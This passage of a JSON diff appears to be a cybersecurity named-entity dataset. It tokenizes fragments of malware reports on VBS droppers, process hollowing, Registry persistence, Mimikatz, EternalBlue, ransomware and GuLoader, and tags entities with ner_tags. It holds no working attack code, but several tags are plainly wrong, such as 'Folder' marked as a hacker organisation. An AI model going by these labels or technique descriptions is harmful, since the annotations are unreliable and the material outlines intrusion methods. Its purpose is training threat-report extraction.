"I-Tool" + ] + }, + { + "tokens": [ + "one", + "Zip", + "contained", + "a", + "benign", + "file", + "named", + "screenshot1242.jpeg", + "and", + "another", + "contained", + "a", + "file", + "named", + "privatecopy.pdf." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "When", + "someone", + "tries", + "to", + "double-click", + "these", + "decoy", + "files,", + "Windows", + "(or", + "the", + "application", + "mapped", + "to", + "the", + "relevant", + "filetype)", + "throws", + "an", + "error", + "because", + "the", + "file", + "isn’t", + "the", + "type", + "of", + "file", + "it", + "appears", + "to", + "be" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "target", + "would", + "then,", + "naturally,", + "double", + "click", + "the", + "other", + "file", + "in", + "the", + "Zip", + "archive" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "command", + "pulls", + "down", + "a", + "Visual", + "Basic", + "script,", + "drops", + "it", + "into", + "the", + "C:\\Windows\\Tasks", + "folder,", + "and", + "executes", + "it." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "90", + "other", + "encrypted" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "heavily", + "obfuscated", + "VBS" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "initial", + "infector", + "is", + "a", + "Visual", + "Basic", + "script,", + "heavily", + "obfuscated" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "block", + "of", + "base64-encoded,", + "encrypted", + "data", + "comprises", + "almost", + "150KB", + "of", + "that", + "script," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "segments", + "of", + "base64", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "along", + "with", + "code", + "that", + "decodes", + "and", + "decrypts", + "the", + "block", + "of", + "base64." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "decoded,", + "the", + "content", + "of", + "the", + "Ir8", + "variable", + "(a", + "segment", + "of", + "which", + "is", + "shown", + "below)", + "turns", + "out", + "to", + "be", + "just", + "another", + "encoded", + "PowerShell", + "script,", + "which", + "the", + "VBS", + "decodes", + "and", + "then", + "executes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "PowerShell", + "script", + "decoded", + "from", + "the", + "Ir8", + "variable", + "uses", + "Reflection." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "performs", + "a", + "BXOR", + "to", + "decode", + "the", + "bytes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "for", + "the", + "Ir8", + "script", + "to", + "decode." + ], + "ner_tags": [ + "O", + "O", + "B-Idus", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "work", + "in", + "tandem", + "to", + "insert", + "data", + "into", + "the", + "Windows", + "Registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "concatenated", + "segments", + "of", + "base64", + "data", + "from", + "O7", + "get", + "inserted", + "into", + "the", + "Registry," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "load", + "the", + "final", + "payload", + "into", + "memory", + "from", + "a", + "Registry", + "value", + "without" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "created", + "a", + "Run", + "key", + "in", + "the", + "Registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "And", + "that", + "Run", + "key", + "references", + "a", + "different", + "Registry", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "On", + "one", + "machine,", + "we", + "found", + "that", + "the", + "malware", + "injected", + "itself,", + "using", + "process", + "hollowing,", + "into", + "ielowutil.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "obfuscated", + "with", + "legitimate", + "resources" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "stack", + "strings" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Embedded", + "Resource" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "from", + "the", + ".data", + "section" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "shellcode", + "that", + "was", + "stored", + "in", + "the", + ".data", + "section", + "is", + "now", + "stored", + "in", + "the", + ".rsc", + "section" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "advapi32.CryptHashData" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "will", + "create", + "a", + "key", + "using", + "advapi32.CryptDeriveKey" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "advapi32.CryptEncrypt" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "kernel32.LoadLibraryA,", + "kernel32.GetProcAddress,", + "kernel32.VirtualAlloc,", + "kernel32.VirtualProtect", + "and", + "ntdll.ZwFlushInstructionCache" + ], + "ner_tags": [ + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "kernel32.VirtualALloc" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "kernel32.VirtualProtect," + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "kernel32.GetLastError" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "kernel32.CreateMutexA" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "wininet.HttpSendRequestA," + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "shellcode", + "injection" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "copy", + "each", + "PE", + "section", + "one", + "at", + "a", + "time" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "creating", + "another", + "PE", + "in", + "memory," + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "injecting", + "a", + "PE", + "executable" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "handle", + "to", + "the", + "current", + "process", + "for", + "the", + "purpose", + "of", + "allocating", + "memory", + "with", + "PAGE_EXECUTE_READWRITE", + "permissions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "decrypt", + "the", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decyrpt", + "its", + "C2", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "get", + "a", + "pointer", + "to", + "the", + "encrypted", + "shellcode", + "and", + "to", + "decrypt", + "it", + "have", + "been", + "broken", + "out", + "into", + "their", + "own", + "separate", + "functions" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "need", + "to", + "resolve", + "these", + "APIs", + "dynamically", + "to", + "interact", + "with", + "the", + "Windows", + "operating", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "resolving", + "many", + "different", + "Windows", + "APIs", + "using", + "kernel32.GetProcAddress" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "enumerating", + "the", + "Process", + "Environment", + "Block", + "(PEB)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "HTTP", + "HEAD", + "request" + ], + "ner_tags": [ + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "check", + "if", + "it", + "is", + "connected", + "to", + "the", + "internet", + "by", + "making", + "a", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "make", + "a", + "HTTP", + "GET", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "will", + "make", + "a", + "POST", + "request" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "NBTScan", + "for", + "network", + "reconnaissance" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "System", + "Network", + "Connections", + "Discovery" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "PsExec", + "for", + "lateral", + "movement" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtained", + "credentials", + "for", + "pivoting", + "with", + "Mimikatz" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "detect", + "memory", + "dumps", + "of", + "the", + "lsass", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OS", + "Credential", + "Dumping:", + "LSASS", + "Memory" + ], + "ner_tags": [ + "O", + "B-SecTeam", + "B-SecTeam", + "O", + "O" + ] + }, + { + "tokens": [ + "had", + "been", + "archived" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "encrypted", + "copy" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "encrypting", + "the", + "base", + "encryption", + "key", + "with", + "RSA", + "(with", + "a", + "hard-coded", + "1024-byte", + "public", + "key)", + "and", + "encoding", + "it", + "in", + "Base64." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uploaded." + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Exfiltration", + "Over", + "C2", + "Channel" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "run", + "bruteforcing", + "offline." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "scan", + "hosts", + "for", + "so-called", + "Eternal*", + "SMB", + "vulnerabilities", + "with", + "SMBTouch", + "and", + "then,", + "where", + "possible,", + "run", + "the", + "EternalBlue", + "exploit", + "and", + "infect", + "the", + "computer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Exp", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Exp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exploitation", + "of", + "Remote", + "Services" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SysUpdate", + "and", + "HyperBro", + "backdoors", + "were", + "installed" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "push", + "Polar", + "ransomware", + "to", + "computers", + "and", + "run", + "it," + ], + "ner_tags": [ + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Three", + "files", + "are", + "sent", + "to", + "the", + "victim's", + "computer:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obtained", + "the", + "credentials", + "of", + "a", + "domain", + "administration", + "at", + "headquarters" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "account", + "of", + "the", + "compromised", + "domain", + "admin" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Valid", + "Accounts:", + "Domain", + "Accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "is", + "a", + ".NET", + "DLL", + "library", + "(compiled", + "on", + "April", + "29,", + "2020)", + "imported", + "when", + "GDFInstall.exe", + "is", + "run" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "XOR", + "decrypted", + "with", + "key", + "ABCSCDFRWFFSDJJHGYUOIj." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "decoded", + "with", + "Base64" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypts", + "a", + "third", + "component" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypted", + "and", + "decoded", + "version" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Deobfuscate/Decode", + "Files", + "or", + "Information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "payload", + "and", + "intermediate", + "library", + "are", + "deleted", + "before", + "completion" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "deletes", + "the", + "intermediate", + "DLL", + "library", + "and", + "encrypted", + "ransomware" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "del" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "del" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "yielding", + "a", + "PE", + "file", + "that", + "is", + "loaded", + "and", + "run", + "in", + "memory", + "with", + ".NET." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "wmic" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "Windows", + "Management", + "Instrumentation" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "wmic" + ], + "ner_tags": [ + "O" + ] + }, + { + "tokens": [ + "cmd.exe", + "Command", + "and", + "Scripting", + "Interpreter:", + "Windows", + "Command", + "Shell", + "looks", + "for", + "list", + "of", + "connected", + "disks", + "and", + "starts", + "recursive", + "traversal", + "of", + "directories", + "sends", + "an", + "HTTP", + "POST", + "request", + "with", + "the", + "name", + "of", + "the", + "victim's", + "computer", + "to", + "a", + "server", + "T1071" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Application", + "Layer", + "Protocol:", + "Web", + "Protocols\"" + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SCHTASKS", + "/Create" + ], + "ner_tags": [ + "B-Way", + "B-Way" + ] + }, + { + "tokens": [ + "schtasks", + "/run" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Scheduled", + "Task/Job:", + "Scheduled", + "Task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Scheduled", + "Task/Job:", + "Scheduled", + "Task" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exploit", + "Public-Facing", + "Application" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Boot", + "or", + "Logon", + "Autostart", + "Execution:", + "Registry", + "Run", + "Keys", + "/", + "Startup", + "Folder" + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Valid", + "Accounts:", + "Default", + "Accounts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Exploitation", + "for", + "Privilege", + "Escalation" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "System", + "Information", + "Discovery" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Lateral", + "Tool", + "Transfer" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Data", + "from", + "Local", + "System" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encrypted", + "Channel:", + "Symmetric", + "Cryptography" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Unpacked", + "file", + "names" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscation", + "of", + "the", + "GuLoader", + "shellcode", + "and", + "payloads" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "download", + "additional", + "malicious", + "files" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "subsequently", + "download", + "Remcos", + "on", + "the", + "target", + "system" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + ":taking", + "full", + "control", + "of", + "the", + "infected", + "machinerecording", + "keystrokes", + "in", + "real", + "time", + "with" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "second", + "shellcode", + "revealed", + "after", + "the", + "unpacking", + "algorithm", + "finished", + "processing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "executable", + "is", + "an", + "archive", + "that", + "can", + "be", + "unpacked", + "with", + "the", + "help", + "of", + "7zip" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "we", + "unpack", + "the", + "file,", + "we", + "can", + "see", + "several", + "elements,", + "as", + "well", + "as", + "directories", + "typical", + "for", + "NSIS:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "It", + "is", + "unpacked" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "packer", + "has", + "been", + "around", + "for", + "many", + "years" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Then", + "the", + "functions", + "are", + "used", + "to", + "load", + "and", + "decrypt", + "the", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "decryption", + "function", + "is", + "custom" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "custom", + "decryption", + "algorithm", + "is", + "being", + "applied", + "on", + "the", + "buffer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "algorithm", + "used", + "for", + "the", + "buffer", + "decryption", + "differs", + "across", + "the", + "samples." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "shellcode", + "is", + "used", + "for", + "decrypting" + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "the", + "key", + "that", + "will", + "be", + "used", + "for", + "the", + "decryption", + "is", + "prepared." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "the", + "PE", + "is", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "we", + "can", + "see", + "decryption", + "of", + "the", + "next", + "stage", + "with", + "the", + "help", + "of", + "a", + "custom", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "contains", + "a", + "very", + "similar", + "function", + "dedicated", + "to", + "decrypting", + "and", + "loading", + "the", + "final", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features" + ] + }, + { + "tokens": [ + "Both", + "of", + "them", + "are", + "encrypted," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "loading", + "the", + "final", + "payload", + "(PE", + "file)", + "from", + "the", + "third", + "of", + "the", + "encrypted", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "authors", + "used", + "several", + "common", + "techniques", + "to", + "obfuscate", + "this", + "process." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "passing", + "the", + "path", + "to", + "the", + "encrypted", + "component", + "as", + "a", + "parameter." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "obfuscating", + "malicious", + "elements." + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "As", + "before,", + "they", + "are", + "resolved", + "by", + "their", + "hashes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Then,", + "a", + "function", + "defined", + "by", + "its", + "hash", + "is", + "retrieved", + "(using", + "the", + "same", + "hashing", + "algorithm", + "that", + "was", + "used", + "to", + "retrieve", + "imports", + "from", + "normally", + "loaded", + "DLLs):" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "By", + "extracting", + "the", + "syscalls,", + "and", + "executing", + "them", + "manually,", + "the", + "malware", + "can", + "use", + "the", + "API", + "of", + "the", + "operating", + "system,", + "without", + "a", + "need", + "of", + "calling", + "functions", + "from", + "the", + "DLL." + ], + "ner_tags": [ + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "functions", + "has", + "been", + "resolved", + "by", + "their", + "hashes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "hashing", + "function", + "used", + "for", + "import", + "resolving" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "By", + "extracting", + "the", + "syscalls,", + "and", + "executing", + "them", + "manually,", + "the", + "malware", + "can", + "use", + "the", + "API", + "of", + "the", + "operating", + "system," + ], + "ner_tags": [ + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "low", + "level", + "APIs:", + "NtCreateSection,", + "NtMapViewOfSection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Functions", + "are", + "always", + "the", + "same", + "–", + "dedicated", + "to", + "reading", + "the", + "file", + "from", + "the", + "disk:", + "CreateFileW,", + "GetTempPathW,", + "lstrcatW,", + "ReadFile,", + "VirtualAlloc,", + "GetTempPathW." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "function", + "GetTempPathW", + "is", + "used" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "low-level", + "functions,", + "directly", + "related", + "with", + "performing", + "the", + "injection,", + "are", + "called", + "via", + "raw", + "syscalls" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "PE", + "injection" + ], + "ner_tags": [ + "B-Tool", + "I-Way" + ] + }, + { + "tokens": [ + "The", + "payload", + "is", + "implanted", + "into", + "a", + "newly", + "created", + "suspended", + "process", + "(a", + "new", + "instance", + "of", + "the", + "current", + "executable)", + "using", + "one", + "of", + "the", + "most", + "popular", + "techniques", + "of", + "PE", + "injection:", + "Process", + "Hollowing" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "a", + "second,", + "encrypted", + "component,", + "which", + "carries", + "the", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "a", + "check", + "against", + "blacklisted", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploiting", + "vulnerabilities", + "in", + "the", + "remote", + "desktop", + "protocol", + "(RDP)." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "distributing", + "phishing", + "emails", + "containing", + "malicious", + "files" + ], + "ner_tags": [ + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "attempts", + "to", + "establish", + "a", + "connection", + "with", + "the", + "remote", + "server", + "to", + "retrieve", + "the", + "subsequent", + "component", + "of", + "the", + "attack" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "a", + "malicious", + "template", + "file", + "is", + "downloaded", + "and", + "executed" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "trigger", + "the", + "retrieval", + "of", + "the", + "final", + "stage", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + 